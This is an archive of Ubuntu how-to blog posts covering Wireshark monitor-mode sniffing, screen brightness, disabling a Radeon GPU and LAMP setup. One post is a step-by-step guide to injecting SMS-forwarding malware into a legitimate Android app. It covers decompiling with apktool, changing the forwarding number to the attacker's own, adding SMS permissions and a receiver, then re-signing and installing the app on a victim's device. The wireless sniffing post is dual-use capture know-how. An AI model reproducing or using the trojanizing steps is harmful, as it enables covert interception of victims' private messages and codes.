Sunday, September 8, 2013

Sniff Public Traffic with Wireshark Monitor Mode and BroadCom Wireless card

In this post I'll show you how to sniff packets with Wireshark's monitor mode in Ubuntu. First of all, you need to check which wireless driver is installed on your computer. In my case, on Ubuntu 13.04, the driver installation can be checked under Additional Drivers.

Click the Ubuntu logo in the upper left corner, search for Software and Updates and click on it.

In the Software and Updates dialog box, click on the Additional Drivers tab and check which driver is installed for the wireless device. In my case it looked like this:

The problem is that you cannot sniff public traffic in monitor mode using the Broadcom STA driver shown above. So select Do not use the device, save, and restart your computer. This option does not do what its name implies: it only stops using the STA driver and falls back to the default open source driver.

One additional thing: if you run sudo iwconfig in a terminal, you can view all wireless interfaces on your computer. Check that your real wireless interface is listed there as a wireless interface (such as wlan0). If it is listed as an ethernet interface (such as eth1), you are still using the Broadcom STA driver. Make sure it is listed as a wireless interface before you go on to the following steps.

Wireless Monitor Mode

If you have used Wireshark previously, you may have sniffed packets arriving at one of your interfaces. For that you need to be connected to the access point or ad-hoc network whose packets you want to capture. In wireless monitor mode you don't need to connect to any network; you can sniff packets freely through Wireshark. This only works with wireless devices, since on a switched wired network you do not receive other hosts' packets.

Promiscuous Mode
Promiscuous mode makes the network card accept every frame it sees, not only those addressed to it. On a hub (not a switch) this lets you capture all packets travelling through the hub, and you need to be connected to the network you want to sniff. It does not give you other hosts' traffic on a switch, because a switch forwards each packet only to the port of the intended receiver instead of flooding it to all ports; to do this, the switch keeps a table that maps its ports to the MAC addresses of the hosts attached to them.

Enable Monitor Mode in BroadCom wireless card

You can use a shell script called airmon-ng in Ubuntu to put your wireless card into monitor mode. Just run the following command.

sudo airmon-ng start wlan0

You will see output like the following.

In the output you can see that monitor mode is enabled on mon0.

mon0 is an interface created by airmon-ng with monitor mode enabled. You can use this interface in Wireshark to sniff all public packets.
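As an added example (not from the original post), here is a small Python check for the two things the text tells you to verify with iwconfig: that the wireless card shows up as a wireless interface such as wlan0 rather than eth1, and that the mon0 created by airmon-ng is in Monitor mode. The iwconfig output embedded below is constructed to exercise both checks.

```python
import re

# Constructed iwconfig output; the layout follows the real tool, the values are made up.
SAMPLE_IWCONFIG = """\
eth1      IEEE 802.11  Nickname:""
          Mode:Managed  Frequency:2.437 GHz  Access Point: Not-Associated
wlan0     IEEE 802.11bgn  ESSID:"home"
          Mode:Managed  Frequency:2.437 GHz  Access Point: 00:11:22:33:44:55
mon0      IEEE 802.11bgn  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm
eth0      no wireless extensions.
lo        no wireless extensions.
"""


def parse_iwconfig(text):
    """Map each interface to its wireless mode (None if it has no wireless extensions)."""
    modes, current = {}, None
    for line in text.splitlines():
        if line and not line[0].isspace():  # a new interface block starts at column 0
            current = line.split()[0]
            modes[current] = None if "no wireless extensions" in line else "unknown"
        if current is None or modes[current] is None:
            continue
        match = re.search(r"Mode:(\S+)", line)
        if match:
            modes[current] = match.group(1)
    return modes


def sta_driver_suspects(modes):
    """Wireless-capable interfaces named eth*: the symptom of the Broadcom STA driver."""
    return sorted(name for name, mode in modes.items()
                  if mode is not None and name.startswith("eth"))


def monitor_interfaces(modes):
    """Interfaces already in Monitor mode, e.g. the mon0 that airmon-ng creates."""
    return sorted(name for name, mode in modes.items() if mode == "Monitor")


if __name__ == "__main__":
    found = parse_iwconfig(SAMPLE_IWCONFIG)
    print("modes:", found)
    print("still on the STA driver:", sta_driver_suspects(found))
    print("monitor-mode interfaces:", monitor_interfaces(found))
```

On a real machine, feed it the output of `sudo iwconfig` instead of the constructed sample.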

Open Wireshark and, on the home screen, double click the mon0 interface in the interfaces list.

If you cannot see any interfaces in the list, you don't have enough privileges. Add your username to the wireshark group as follows (you can start Wireshark as root and see all interfaces, but Wireshark discourages running it with sudo):
$ sudo dpkg-reconfigure wireshark-common
$ sudo usermod -a -G wireshark <username>

and restart your machine for the change to take effect.

When you double click on mon0, you'll see the following options.

Check the Capture packets in monitor mode checkbox, then click OK.

Then go to Capture --> Interfaces.

Uncheck all interfaces except mon0. (If there's heavy wireless traffic around you, you'll see hundreds of thousands of packets go through that interface.)

Then start the capture. Done! You'll see Wireshark capture all the wireless traffic around you.

Starting monitor mode with airmon-ng is essential. Without it, you can start a capture in monitor mode on the wlan0 interface if you are connected to a network, but within 10 seconds of starting the capture you'll be disconnected from your wireless network.

Thursday, September 5, 2013

Change Screen Brightness in Ubuntu Terminal

I had a problem changing the brightness on my HP Pavilion G6 laptop: I could not change it using the function keys. Although I could change it from the Brightness & Lock settings, the lowest brightness level was still too bright for me, so I used the following method to reduce it.

sudo -s
nano /sys/class/backlight/intel_backlight/brightness

(In my case it was intel_backlight; this may differ from computer to computer.) Edit the value in the file. In my case the value was about 4000, so I reduced it to 800 and saved, and the brightness was reduced. You can reduce the brightness to any level just by editing this file.

If you want to reduce the brightness at every startup, include the following command in the /etc/rc.local file. (/etc/rc.local is executed at the end of every startup, so a command placed there runs on every boot.)

echo 800 > /sys/class/backlight/intel_backlight/brightness

Restart your computer and you'll see your command take effect.

A little more fun:
I created a small shell script (.sh) to reduce my brightness to any level at any time easily. Without this script I would have had to change the brightness using the entire command given above. The script makes it easy: I just execute it and pass the brightness value as a command line parameter, as follows.

./brightness 600

Here is my shell script (run it as root, since it writes to sysfs):
#!/bin/bash
# $1 is the brightness value passed on the command line, e.g. ./brightness 600
echo "$1" > /sys/class/backlight/intel_backlight/brightness
printf '[+] Brightness set to %s\n' "$1"

Android Malware Injection into Original Apps in Ubuntu

This is a post I have posted on my other blog, Insider Attack.

In this post I am going to describe how malicious code can be injected into an original app using Ubuntu. For this post I have created a small malicious app which intercepts incoming SMS messages and forwards them to another person without the victim knowing when a message is received. You need the following files to do this:

  • APKtool (for Windows, you may need to download a Windows version of apktool here)
  • SignAPK.jar + keys
  • Malicious SMSHacker.apk app
You can download all of these with this link;

Here is a rough sketch of the process:
  1. Decompile the original Android app (.apk) using apktool
  2. Decompile the malicious Android app (SMSHacker.apk) using apktool
  3. Inject the decompiled malicious app's files into the decompiled original app (copy the malicious files over)
  4. Inject the permissions from the malicious apk's AndroidManifest.xml into the original app's AndroidManifest.xml
  5. Recompile the infected original app using apktool
  6. Sign the recompiled app using signapk.jar
  7. Install the recompiled and signed apk file on the victim's device
Let's follow the listed steps:

Step 1:

Download all the files I have given in the above mediafire link. I have included all required files, including the sample SMSHacker app for testing. Copy all files into a single directory.

Copy the apk file into which you need to inject SMSHacker into the same directory. You can keep your apk file in its own directory, but then you need to give the path to it explicitly in the following step.

Open a terminal and go to that directory. Run the following command to decompile your original apk file (Android app). Let's say your original apk filename is myapp.apk;

./apktool d myapp.apk MyAppDec

In the above command the 'd' switch means you are decompiling the myapp.apk file. With 'MyAppDec' you tell apktool to put the decompiled app in a directory named 'MyAppDec' in the same folder.

Step 2:

Now decompile your malicious file (SMSHacker.apk) too;

./apktool d SMSHacker.apk SMSHackerDec

Then you'll see two directories, SMSHackerDec and MyAppDec, in the same folder, containing the decompiled files.

Step 3:

If you browse into these folders, you'll note that there is a folder called smali in both decompiled app folders. This smali folder contains all the files decompiled from the apk: when you decompile an apk, its classes are turned into files of type .smali. Now go into the folder which contains all the smali files of the malware (SMSHacker) with this command.

cd SMSHackerDec/smali/com/sms/smshacker/

Then open the SMSHacker.smali file in gedit.

gedit SMSHacker.smali

I created this malware and tested it on emulators, so I set the SMS forwarding number to '5554'. You can change it to your own and have all of the victim's received messages forwarded to your own number. So search for the string '5554' in the SMSHacker.smali file and replace it with your preferred number (say your backup phone :D).

Now copy these malicious files into the decompiled original app's files.

cd ../../../../../
cp SMSHackerDec/smali/com/* -R MyAppDec/smali/com/

Now the files are injected into the original folder. Next we need to inject the required permissions from SMSHacker's AndroidManifest.xml file into the original app's AndroidManifest.xml file.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit.

gedit SMSHackerDec/AndroidManifest.xml

You'll see three lines like these in the file.

    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />

Actually we do not need the third permission for this purpose. So copy the first two lines into the MyAppDec/AndroidManifest.xml file before the <application> tag.

You might also see a few lines like the following inside the malicious file's AndroidManifest.xml

<receiver android:name="com.sms.smshacker.SMSHacker">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />

Copy this part into MyAppDec/AndroidManifest.xml within the <application> tag and before the first <activity> tag.

Now save MyAppDec/AndroidManifest.xml and close gedit.

Now we have successfully injected the files and permissions and can recompile the new app using apktool.

Step 5:

Go to the directory where apktool and the other files are and run apktool to recompile the app.

./apktool b -f MyAppDec myhackedapp.apk

The 'b' switch means build and '-f' means 'force': it skips apktool's change detection and rebuilds all files, so the build goes through without complaints.

After running that command you'll see a new myhackedapp.apk file in the same folder.

Step 6:

We need to sign the app using signapk.jar before installation. This signing step is important because you cannot install an unsigned app on a device or an emulator.

Sign your apk file with the following command.

java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You'll see your signed apk file, named myhackedapp-signed.apk.

Now we are done. We can install this apk file on any device and let the victim execute the malicious code.

SMSHacker.apk is actually an app with a broadcast receiver. When a message is received, the receiver gets invoked and executes the code inside its handler; I have included code there to forward the message to another phone. The <receiver> information must be present in the AndroidManifest.xml file for this to work, which is why we injected the <receiver> entry from the malicious manifest into the original manifest. We also require permissions to read an incoming message and to send an SMS, so we injected the read-SMS and send-SMS permissions into the original app's manifest.

When installed, this is visible as a normal app on the victim's device, and when the victim runs the app for the first time the receiver starts. After that, even if the victim closes the original app, the receiver continues listening for incoming SMS.
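From the defender's side, the injection described above leaves two traces in the manifest: extra SMS permissions, and a receiver for SMS_RECEIVED whose class lies outside the app's own package. The following Python auditor is an added example, not code from the original post or its framework; it flags both traces in a constructed manifest modelled on what MyAppDec/AndroidManifest.xml looks like after Step 4 (the package name com.example.myapp is made up).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS

# The two permissions the post copies over and the broadcast its receiver listens for.
SMS_PERMISSIONS = {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"


def audit_manifest(xml_text):
    """Return a list of human-readable findings for one decompiled AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    findings = []
    requested = {p.get(NAME) for p in root.iter("uses-permission")}
    for perm in sorted(requested & SMS_PERMISSIONS):
        findings.append("requests " + perm)
    for receiver in root.iter("receiver"):
        cls = receiver.get(NAME, "")
        actions = {a.get(NAME) for a in receiver.iter("action")}
        if SMS_RECEIVED not in actions:
            continue
        note = "receiver %s listens for SMS_RECEIVED" % cls
        # A leading dot means the class is relative to the app's own package.
        if package and not (cls.startswith(".") or cls.startswith(package + ".")):
            note += " from a class outside package " + package
        findings.append(note)
    return findings


# Constructed sample: an app manifest after the post's Step 4 (permissions and receiver added).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.myapp">
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <application android:label="MyApp">
        <receiver android:name="com.sms.smshacker.SMSHacker">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <activity android:name=".MainActivity" />
    </application>
</manifest>
"""

if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print("[!]", finding)
```

Run it against the AndroidManifest.xml that apktool writes when decompiling an apk you want to vet; a clean copy of the app should produce no findings.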

I have included this as a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can inject many types of payloads into any original app.

Thanks for reading and if there are any issues, post a comment below.

Wednesday, September 4, 2013

Shut Down the Radeon Graphics Card to Save Battery and Solve the Overheating Problem

If you are using a Radeon or any other dedicated AMD graphics card alongside Intel graphics in your laptop, you might have encountered overheating and shorter battery life. You can shut down the AMD graphics card permanently, let the Intel graphics work alone, and solve both problems. In my case I have an HP Pavilion G6 with an AMD Radeon 6470M and I faced the same situation. So I ran the following commands and shut down the AMD graphics card. Now my overheating problem is solved and my battery life is back to normal.

Run the following in a terminal

sudo chown -R username:username  #replace 'username' with your username
sudo -s
echo OFF > /sys/kernel/debug/vgaswitcheroo/switch   # the switch file expects the command in upper case

To run this at every startup, open the /etc/rc.local file,

sudo nano /etc/rc.local

Include echo OFF > /sys/kernel/debug/vgaswitcheroo/switch in that file before the exit statement.

Install and Configure LAMP Server and phpMyAdmin on Ubuntu

Hello all. As the first post on my Ubuntu blog I am going to describe how to install and configure the Apache web server on Ubuntu. Most tutorials found on the internet describe either how to install the Apache web server or how to install phpMyAdmin on Ubuntu. In this tutorial I'll describe how to install the Apache web server using LAMP (the Linux version of WAMP, as you may know), install phpMyAdmin and configure it to work together with Apache, and discuss some frequently asked questions about working with Apache on Ubuntu. Well, let's start..

We are going to install LAMP (Linux, Apache, MySQL, PHP) on Ubuntu, which is a 3-in-1 server. If you have ever used WAMP on Windows, this is the equivalent for Ubuntu. After installing LAMP, you can run your PHP pages/websites on your local machine.

To install LAMP, open a terminal and run the following command

sudo apt-get install lamp-server^

When you are asked for a username and password for MySQL database access, give a preferred username and password.

After finishing the installation, you can check whether your web server works by browsing to http://localhost. If LAMP is installed properly and running, you will see a simple page saying 'It works'.
If you cannot access localhost, either the installation was unsuccessful or the web server is not running yet. If it is installed properly but has not been started, you can start it manually with the following command.

sudo /etc/init.d/apache2 start

Now that the LAMP installation is complete, let's install phpMyAdmin. Run the following command to install it.

sudo apt-get install phpmyadmin

Then we have to configure phpMyAdmin to work with Apache. For that, run the following command.

sudo gedit /etc/apache2/apache2.conf

gedit will open the apache2.conf file for you; add the following line at the end of the file.

Include /etc/phpmyadmin/apache.conf

Save the file and restart the Apache web server with the following command.

sudo /etc/init.d/apache2 restart

Check your phpMyAdmin installation by browsing to http://localhost/phpmyadmin. You will be taken to phpMyAdmin and can log in with the username and password you provided for MySQL during the LAMP installation.

Now that you have configured both LAMP and phpMyAdmin, you can run a website by copying its files into the /var/www/ folder. Note that writing into this folder requires root permissions, so you need to copy files into it from a terminal with sudo, or launch Nautilus as root (run sudo nautilus in a terminal) to copy files in the Ubuntu GUI. This is annoying for a new Ubuntu user, so let's find a solution.

Since writing into the website directory requires root permissions, we can change the website directory to one of our own that we can write to with our existing permissions. We can create a directory in our home directory and configure it as the www folder. To do that, follow these steps.

Open the following files and replace every occurrence of '/var/www' with your preferred web folder (say /home/<your-username>/www)

sudo gedit /etc/apache2/sites-available/default
sudo gedit /etc/apache2/sites-available/default-ssl

Then restart Apache:

sudo /etc/init.d/apache2 restart

Now you can easily copy files into your folder and access them via the browser.